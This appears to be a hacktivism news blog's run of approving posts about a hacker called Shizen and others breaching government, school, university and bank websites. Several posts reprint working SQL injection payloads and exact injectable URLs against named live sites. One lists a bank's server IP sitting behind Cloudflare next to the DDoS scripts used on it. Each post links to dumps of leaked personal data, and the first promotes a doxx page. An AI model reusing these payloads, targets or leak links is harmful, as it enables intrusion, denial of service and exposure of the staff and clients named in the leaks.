Hacker Doxx’s Suspect To Avenge Leak of Brasilian Federal Police

In a move I have honestly never seen before, a hacker going by the name of “Sharp3” has managed to uncover the identity of another hacker going by the name of “Tr3v0r” – whom was responsible for a hack and data leak effecting the Brasilian Federal Police earlier this morning. Not only this, but Sharp3 also personally took it upon himself to assemble screen shots of the leaked data, proof of authorship that Tr3v0r first hacked and leaked the information, as well as personal pictures exposing his real life identity. Sharp3 then complied the entirety of the information and loaded it onto a custom domain – see below – and hand delivered the information to inbox’s of each of the 249 police officers exposed by this mornings data breach – lulz.

It should go without saying, but this is a doxx the likes of which no one has ever seen before – which is what makes it news worthy here today. It also adds to a recent trend over the last 3 weeks or so, of different hackers being exposed by other hackers. For example, Sh4rpShooter of Pryzraky, Shizen of New World Hackers and Mr. Attacker of AnonGhost have all been exposed by rival hackers within the course of the last two weeks alone.

Website Featuring Doxx of Tr3v0r: https://www.inocent.com.br/uploads/tr3v0r.php

Screen Shot from Doxx:

No photo description available.

 

Batticaloa Municipal Council of Shri Lanka Hacked, Site Databases Leaked Online

Shortly after new year’s 2019, hackers “Shizen” and “Ftp” announced a hack of the Batticaloa Municipal Council in Sri Lanka. While the leak contains some 760 lines, most notably within it, hackers were able to uncover the personal information of 22 website administrators, including their usernames, email addresses, phone numbers and full passwords – theoretically granting anyone access to the back end of the website. Also included in the leaked databases is personal information on 100 Municipal Council members, including their full names, addresses, emails, ID numbers, passwords, phone numbers and usernames.

Website Effected: hxxp://batticaloa.mc.gov.lk
Raw Leak: https://ghostbin.com/paste/r5s4d

Examples:

No automatic alt text available.

No automatic alt text available.

https://twitter.com/__sh1z3n/status/1080216837873459201

East Sac Community School District Hacked, Databases Leaked Online

Last night “Shizen and “Ftp of New World Hackers announced a hack of East Sac Community School District in Lake View, Iowa, allowing the group to gain remote access to several site databases before compiling and ultimately dumping the information online. In a press release made available to the public through Ghostbin, Shizen explains how they were able to hack the website through various SQL Injections, granting them access to PHP 5.6.23 files hosted in a MySQL database on the Nginx web server of a WordPress website.

Parameter: id (GET)

Target: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: id=7 AND 1973=1973

Type: error-based
Title: MySQL >= 5.0 AND error-based – WHERE, HAVING, ORDER BY, or GROUP BY clause (FLOOR)
Payload: id=7 AND (SELECT 4390 FROM SELECT COUNT(*), CONCAT(0x7170716271, (SELECT (ELT(4390=4390,1))),0x716a767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.P LUGINS GROUP BY x)a)

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND te-based blind
Payload: id=7 AND SLEEP(5)

Exposed within the leak are the exact vulnerabilities effecting the site, the payloads delivered to compromise it, as well as the root admin username and password. You can also find the contact information of various school employees/administrators, including full names, positions, email addresses and phone numbers, as well as the login user names, emails and hashed passwords of various site administrators.

Website Hit: hxxp://eastsac.k12.ia.us/
Raw Leak: https://ghostbin.com/paste/hwpf2

https://twitter.com/__sh1z3n/status/1079928590517657601?s=19

Agência de Tecnologia da Informação do Piauí Hacked by Shizen & Ftp

Just before the start of the new year, December 31st 2018, hackers “Shizen” and “Ftp” of New World Hackers announced a joint hack of the Information Technology Agency of Piauí, Brasil, managing to leak the contents of databases tied to the Hematology and Hemotherapy Center of Piaui online. Having covered Shizen many times throughout the past, this appears to be the first hack carried out under the banned of New World Hackers, after previously conducting hacks on behalf of Pryzraky – perhaps indicating a change of teams or allegiances. 

Regardless, to serve as proof of the hack, in a data dump posted to Twitter this morning, the hackers posted a mirror of the sites contents – 21 different databases in all. Analyzing the hack, it appears as though the group was able to gain remote access to site databases through a multitude of SQL vulnerabilities left unaddressed by site security architects, ultimately granting hackers access to PHP 5.3.3 files, attached to a MySQL 5.0 Database hosted on an Apache 2.2.16 web server. In another surprise move, Shizen even released the exact vulnerabilities effected and payloads delivered within the framework of the leak itself – something normally redacted or kept private.

For Example, Here are The 4 SQL Vulnerabilities Implicated:

Website Hit: hxxp://hemopi.pi.gov.br/

Vulnerability 1: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: id=13′ AND 7214=7214 AND ‘aWjt’=’aWjt

Vulnerability 2: error-based
Title: MySQL >= 5.0 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=13′ AND (SELECT 8268 FROM(SELECT COUNT(*),CONCAT(0x716a767071,(SELECT (ELT(8268=8268,1))),0x716a716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ‘lEbP’=’lEbP

Vulnerability 3: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=13′ AND SLEEP(5) AND ‘ouoQ’=’ouoQ

Vulnerability 4: UNION query
Title: Generic UNION query (NULL) – 4 columns
Payload: id=13′ UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a767071,0x78547676494a654761784744686253746e706c6f6a6a57526655576a6e6863626866495874446f56,0x716a716a71)– EKMl

Raw Database Leak: https://ghostbin.com/paste/6w4ok

Image may contain: text

https://twitter.com/__sh1z3n/status/1079589738355531777

l’academie de Grenoble Refused To Negotiate, So SHIZEN Dumps SQL Vulnerabilities & Exposed Databases Online

On December 6th 2018, Rogue Media Labs covered an article detailing the hack of two international University’s by a Brasilian based hacker known as “SHIZEN.” However, what made the incident interesting or unique at the time was that SHIZEN did not disclose the databases he had uncovered, or how he went about doing so – something he is regularly known for doing. Instead, he tagged l’academie de Grenoble in the hack, asking them to reach out to him to learn where/how he got into their systems and where their website was vulnerable. Over the course of the last week and a half since, SHIZEN has continued to keep this information to himself, trolling the University on multiple occasions asking them to contact him about the hack – less he release the information in its entirety online. After days with no response, this is exactly what SHIZEN did this morning.

In a data dump released to the public via Ghostbin this morning, December 15th 2016, SHIZEN released the contents of the databases exposed in the December 6th hack, explaining how he was able to breach l’academie de Grenobles’s website through an SQL vulnerability tied to the academy’s math department. More specifically, SHIZEN was able to hack php version 5.3.3 files belonging to an extremely outdated MySQL database attached to a nginx web server. In fact, the MySQL database was so outdated that it’s version wasn’t even readably identifiable.

Target Website: hxxp://ac-grenoble.com
SQL User Haxxed: plantet_math@triton2.ac-grenoble
Location of SQL Injection: hxxps://ac-grenoble.fr/disciplines/maths/pages/PM/fonction/telechargement.php?/fichier/=1899%27%20and%20[t]%20and%20%271%27=%271
Database Name: De8u1
Data Dump: https://ghostbin.com/paste/58cjh

https://twitter.com/__sh1z3n/status/1074336600333656064?s=19

Central Bank of The Bahamas Crashed for +28 Hours by SHIZEN

In conjunction with #OpIcarus2018, hacker “SHIZEN” of Pryzraky has launched a series of web attacks and DDoS against central banks worldwide. Chief among them was an attack on the Central Bank of the Bahamas, which was downed for well over 24 hours between the dates of December 12th to 14th, 2018. As of 9 a.m. Friday morning the banks official website appears to be back up and running again, but the sites administrators have had to install Cloudflare just to make this happen.

Upon investigating the website further, the sites theme manager and developer, Thyme Online, has still yet to even install an active SSL certificate for the website and its front-end still suffers from a lack of basic and fundamental security measures. According to their web page, the Central Bank of the Bahamas currently manages over 55 million dollars in assets, but it remains unclear how much a financial impact the latest cyber attack has had on their business.

According to SHIZEN, “The Central Bank Of Bahamas it’s an easy target, the website is protected by Cloudflare but as long as the DDoS doesn’t exceed the 1 TBPS limit. I have attacked with a Python Script named: http://leet.py & http://blastaered.pl The website has been taken down for 28 hours before it was changed over to Cloudflare, now if you make an check-host you can see an error “503 (Service Temporarily Unavailable)”, the website works because he have changed the Cloudflare, so I think I’ll try to take down it with an IRC Botnet or an MIRAI next.Rogue Security Labs has reached out to the Bahamas Central Bank for comment on the incident, but as of December 15th 2018 the bank has declined to respond.

Website Hit: hxxp://centralbankbahamas.com
American Bank Proxy: 104.31.86.108
Target Behind Cloudflare: 24.244.141.213

https://twitter.com/zglobal_/status/1073103906119520256

https://twitter.com/LulzSeguridad/status/1073472075979997184

https://twitter.com/zglobal_/status/1073460209249673216

San Jose State University Hacked, French National Police/DynDNS/Internet Brasil Downed by Shizen

This past weekend SHIZEN of the Brasilian based hacking group Pryzraky was active in a string of international incidents. The first hack targeted San Jose State University in California – USA, the second targeted French National Police and DynDNS, also located in France, and the third targeted Internet Brasil – all via Denial of Service (DoS) attacks.

In a statements online, SHIZEN explained how he was able to target San Jose State University through an SQL vulnerability tied to the sites back end – though he opted to keep the specific URL effected private from the public. Using it, SHIZEN managed to exploit a My SQL version 4.1 database attached to an Oracle iPlantet 7.1 web server, exposing approximately 42 databases attached to/affiliated with the website. SHIZEN officially labeled the hack #OpEdu, a new global hacking operation targeting international universities and educational institutions unveiled to the public for the first time just last week.

Website Effected: hxxp://as.sjsu.edu
Raw Leak: https://ghostbin.com/paste/g3rmc

https://twitter.com/zglobal_/status/1071686648390393864?s=19

In support of the French National protests and in support of #OpFrance, an Anonymous operation designed to take down/hack websites associated with the French Government and French banking institutions, SHIZEN‘s second round of attacks Saturday night targeted various networks around France. The first DoS attack target French National Police, managing to take their website offline for at least the better part of the day. In fact, at the time of this article, December 9th 2018 20:00, the website still remains inaccessible to the international public. The second attack targeted an OVH server tied to DynDNC France, managing to take it offline for a few hours. Lastly, the last DoS attack took down the website affiliated with Internet Brasil, a Brasilian based telecommunications firm.

Websites Tango Down’ed:

hxxp://nationale-police.net
hxxp://dyndns.fr
hxxp://internetbrasil.com.br

https://twitter.com/zglobal_/status/1071869522066452485?s=19

https://twitter.com/zglobal_/status/1071432165185998848?s=19

https://twitter.com/zglobal_/status/1071672761469333504?s=19

Academia Nacional De La Historia De La Republica Argentina Hacked by Pryzraky

On December 6th 2018, the website of the Academia Nacional De La Historia De La Republica Argentina (the National Academy of History of the Argentine Republic) was hacked, and sensitive information tied to clients of the website were leaked online. The hack was claimed as a result of a joint operation conducted by Brasilian Based hacking group “Pryzraky,” including members @Mecz1nho@Ergo_hacker@SH4RPSH0OTER@Purpl3P@Lil_Sh4wtyy@zglobal_@Penichemito.

According to SHIZEN, hackers were able to exploit an Apache 2, PHP 7.0.30 file server attached to the back end of the website via SQL Injection – though they declined to share the exact payload or specific URL address effected. Among the data exposed, includes the first and last names, telephone numbers, email addresses, physical addresses and identification numbers of various clients belonging to the website.

Website Effected: hxxp://www.anh.org.ar/
Raw Full Leak: https://ghostbin.com/paste/nmw7d

https://twitter.com/zglobal_/status/1070775158414237696

Data/Telecommunications Firm Digitel Brasil Hacked, Hundreds of Restricted Access Account Owners Emails & Passwords Dumped Online

Earlier today, December 6th 2018, Digitel Brasil, a Brasilian based tech firm specializing in enterprise data and telecommunications solutions, was hacked by “SHIZEN – member of the Brasilian based hacking group Pryzraky. In a press release made available the the public via his Twitter page, SHIZEN explains how he was able to breach a Microsoft-IIS/6.0 web server tied to the IP Address of 192.252.46.52 through an SQL Injection vulnerability tied to the sites back-end, exposing 3 databases, 26 tables and hundreds of email accounts along with their passwords. To be more exact, approximately 255 registered account owners with restricted access to digetel.com.br had their login email addresses and passwords compromised by the data breach.

When asked whether the accounts exposed belonged to Digitel Brasil customers or corporate employees, SHIZEN simply responded “Yes!” – indicating that the leak was a mixture of both. At this time Digitel Brasil has yet to release a statement on the matter, and it remains unclear if they are even aware of the breach in the first place.

Website Effected: hxxp://digitel.com.br
Raw Data Leak: https://pastebin.com/beYvDSDE

https://twitter.com/zglobal_/status/1070561436710199296

Baqai Medical University In Pakistan & French l’académie de Grenoble Hacked by SHIZEN

Despite announcing his intentions to “go inactive for while” at the start of the month, earlier today, December 5th 2018, a hacker going by the name of “SHIZEN” announced his latest string of hacks on social media. The first attack targeted l‘académie de Grenoble in France, disclosing an SQL vulnerability tied to the sites back end – exposing two site databases. The second hack targeted Baqai Medical University in Sindh, Pakistan, analysis of which suggests that SHIZEN was able to exploit a misconfiguration of the websites php file admin access panel also via SQL injection, allowing for hackers to remotely access databases attached to the site.

While no explanation or motive for the hacks was given, SHIZEN did tag the hack #OpEdu, perhaps indicating that this was the beginning of a much larger operation targeting international educational institutions in the near future? Other groups such as “PinkiHacks in Israel have also been very active hacking major international universities over the course of the last several weeks as well – though at this time there appears to be no correlation between the attacks/incidents.

l’académie de Grenoble Hack:

Website Effected: hxxp://ac-grenoble.fr/

Image may contain: text

No automatic alt text available.

Baqai Medical University Hack & Leak:

Website Effected: hxxp://baqai.edu.pk/
URL Address Exploited: hxxp://baqai.edu.pk/NewsDetail.php?id=47999999.9
Raw Leak: https://ghostbin.com/paste/37toz

No automatic alt text available.

https://twitter.com/zglobal_/status/1070357285849976839

https://twitter.com/zglobal_/status/1070345966866325504